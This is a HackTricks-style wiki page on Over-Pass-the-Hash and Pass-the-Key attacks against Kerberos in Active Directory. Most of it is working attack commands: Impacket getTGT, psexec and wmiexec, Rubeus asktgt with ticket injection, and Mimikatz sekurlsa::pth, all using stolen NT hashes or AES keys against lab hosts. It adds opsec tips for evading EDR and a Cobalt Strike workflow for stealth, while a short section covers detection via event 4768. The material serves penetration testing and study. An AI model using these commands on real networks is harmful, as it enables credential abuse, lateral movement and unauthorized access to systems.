over-pass-the-hash-pass-the-key.md (7137B)
1 --- 2 title: "Over Pass the Hash/Pass the Key" 3 section: "Windows" 4 sectionSlug: "windows-hardening" 5 sourcePath: "src/windows-hardening/active-directory-methodology/over-pass-the-hash-pass-the-key.md" 6 sourceUrl: "https://github.com/HackTricks-wiki/hacktricks/blob/188de82beb54e70956b2952367a0af91d26758b8/src/windows-hardening/active-directory-methodology/over-pass-the-hash-pass-the-key.md" 7 sha: "188de82beb54e70956b2952367a0af91d26758b8" 8 isIndex: false 9 modified: true 10 license: "CC-BY-NC-4.0" 11 --- 12 13 # Over Pass the Hash/Pass the Key 14 15 ## Overpass The Hash/Pass The Key (PTK) 16 17 The **Overpass The Hash/Pass The Key (PTK)** attack is designed for environments where the traditional NTLM protocol is restricted, and Kerberos authentication takes precedence. This attack leverages the NTLM hash or AES keys of a user to solicit Kerberos tickets, enabling unauthorized access to resources within a network. 18 19 Strictly speaking: 20 21 - **Over-Pass-the-Hash** usually means turning the **NT hash** into a Kerberos TGT via the **RC4-HMAC** Kerberos key. 22 - **Pass-the-Key** is the more generic version where you already have a Kerberos key such as **AES128/AES256** and request a TGT directly with it. 23 24 This difference matters in hardened environments: if **RC4 is disabled** or no longer assumed by the KDC, the **NT hash alone is not enough** and you need an **AES key** (or the cleartext password to derive it). 25 26 To execute this attack, the initial step involves acquiring the NTLM hash or password of the targeted user's account. Upon securing this information, a Ticket Granting Ticket (TGT) for the account can be obtained, allowing the attacker to access services or machines to which the user has permissions. 27 28 The process can be initiated with the following commands:<sup>[[1]](#references)</sup> 29 30 ```bash 31 python getTGT.py -dc-ip 10.10.10.10 jurassic.park/velociraptor -hashes :2a3de7fe356ee524cc9f3d579f2e0aa7 32 export KRB5CCNAME=/root/impacket-examples/velociraptor.ccache 33 python psexec.py jurassic.park/velociraptor@labwws02.jurassic.park -k -no-pass 34 ``` 35 36 For scenarios necessitating AES256, the `-aesKey [AES key]` option can be utilized:<sup>[[1]](#references)</sup> 37 38 ```bash 39 python getTGT.py -dc-ip 10.10.10.10 jurassic.park/velociraptor -aesKey <AES256_HEX> 40 export KRB5CCNAME=velociraptor.ccache 41 python wmiexec.py -k -no-pass jurassic.park/velociraptor@labwws02.jurassic.park 42 ``` 43 44 `getTGT.py` also supports requesting a **service ticket directly through an AS-REQ** with `-service <SPN>`, which can be useful when you want a ticket for a specific SPN without an extra TGS-REQ: 45 46 ```bash 47 python getTGT.py -dc-ip 10.10.10.10 -aesKey <AES256_HEX> -service cifs/labwws02.jurassic.park jurassic.park/velociraptor 48 ``` 49 50 Moreover, the acquired ticket might be employed with various tools, including `smbexec.py` or `wmiexec.py`, broadening the scope of the attack. 51 52 Encountered issues such as _PyAsn1Error_ or _KDC cannot find the name_ are typically resolved by updating the Impacket library or using the hostname instead of the IP address, ensuring compatibility with the Kerberos KDC. 53 54 An alternative command sequence using Rubeus.exe demonstrates another facet of this technique:<sup>[[1]](#references)</sup> 55 56 ```bash 57 .\Rubeus.exe asktgt /domain:jurassic.park /user:velociraptor /rc4:2a3de7fe356ee524cc9f3d579f2e0aa7 /ptt 58 .\PsExec.exe -accepteula \\labwws02.jurassic.park cmd 59 ``` 60 61 This method mirrors the **Pass the Key** approach, with a focus on commandeering and utilizing the ticket directly for authentication purposes. In practice: 62 63 - `Rubeus asktgt` sends the **raw Kerberos AS-REQ/AS-REP** itself and does **not** need admin rights unless you want to target another logon session with `/luid` or create a separate one with `/createnetonly`.<sup>[[2]](#references)</sup> 64 - `mimikatz sekurlsa::pth` patches credential material into a logon session and therefore **touches LSASS**, which usually requires local admin or `SYSTEM` and is noisier from an EDR perspective. 65 66 Examples with Mimikatz: 67 68 ```bash 69 sekurlsa::pth /user:velociraptor /domain:jurassic.park /ntlm:2a3de7fe356ee524cc9f3d579f2e0aa7 /run:cmd.exe 70 sekurlsa::pth /user:velociraptor /domain:jurassic.park /aes256:<AES256_HEX> /run:cmd.exe 71 ``` 72 73 To conform to operational security and use AES256, the following command can be applied: 74 75 ```bash 76 .\Rubeus.exe asktgt /user:<USERNAME> /domain:<DOMAIN> /aes256:HASH /nowrap /opsec 77 ``` 78 79 `/opsec` is relevant because Rubeus-generated traffic differs slightly from native Windows Kerberos. Also note that `/opsec` is intended for **AES256** traffic; using it with RC4 usually requires `/force`, which defeats much of the point because **RC4 in modern domains is itself a strong signal**. 80 81 ## Detection notes 82 83 Every TGT request generates **event `4768`** on the DC. In current Windows builds this event contains more useful fields than older writeups mention: 84 85 - `TicketEncryptionType` tells you which enctype was used for the issued TGT. Typical values are `0x17` for **RC4-HMAC**, `0x11` for **AES128**, and `0x12` for **AES256**.<sup>[[3]](#references)</sup> 86 - Updated events also expose `SessionKeyEncryptionType`, `PreAuthEncryptionType`, and the client's advertised enctypes, which helps distinguish **real RC4 dependence** from confusing legacy defaults. 87 - Seeing `0x17` in a modern environment is a good clue that the account, host, or KDC fallback path still permits RC4 and is therefore more friendly to NT-hash-based Over-Pass-the-Hash. 88 89 Microsoft has been progressively reducing RC4-by-default behavior since the November 2022 Kerberos hardening updates, and the current published guidance is to **remove RC4 as the default assumed enctype for AD DCs by the end of Q2 2026**. From an offensive perspective, that means **Pass-the-Key with AES** is increasingly the reliable path, while classic **NT-hash-only OpTH** will keep failing more often in hardened estates.<sup>[[3]](#references)</sup> 90 91 For more details on Kerberos encryption types and related ticketing behaviour, check: 92 93 [Kerberos Authentication](/hacktricks/windows-hardening/active-directory-methodology/kerberos-authentication) 94 95 ## Stealthier version 96 97 > [!WARNING] 98 > Each logon session can only have one active TGT at a time so be careful. 99 100 1. Create a new logon session with **`make_token`** from Cobalt Strike. 101 2. Then, use Rubeus to generate a TGT for the new logon session without affecting the existing one. 102 103 You can achieve a similar isolation from Rubeus itself with a sacrificial **logon type 9** session: 104 105 ```bash 106 .\Rubeus.exe asktgt /user:<USERNAME> /domain:<DOMAIN> /aes256:<AES256_HEX> /createnetonly:C:\Windows\System32\cmd.exe /show /ptt 107 ``` 108 109 This avoids overwriting the current session TGT and is usually safer than importing the ticket into your existing logon session. 110 111 ## References 112 113 - [1] [Tarlogic - Kerberos (II): ¿Cómo atacar Kerberos?](https://www.tarlogic.com/es/blog/como-atacar-kerberos/) 114 - [2] [GhostPack - Rubeus (GitHub repository)](https://github.com/GhostPack/Rubeus) 115 - [3] [Microsoft Learn - Detect and Remediate RC4 Usage in Kerberos](https://learn.microsoft.com/en-us/windows-server/security/kerberos/detect-remediate-rc4-kerberos)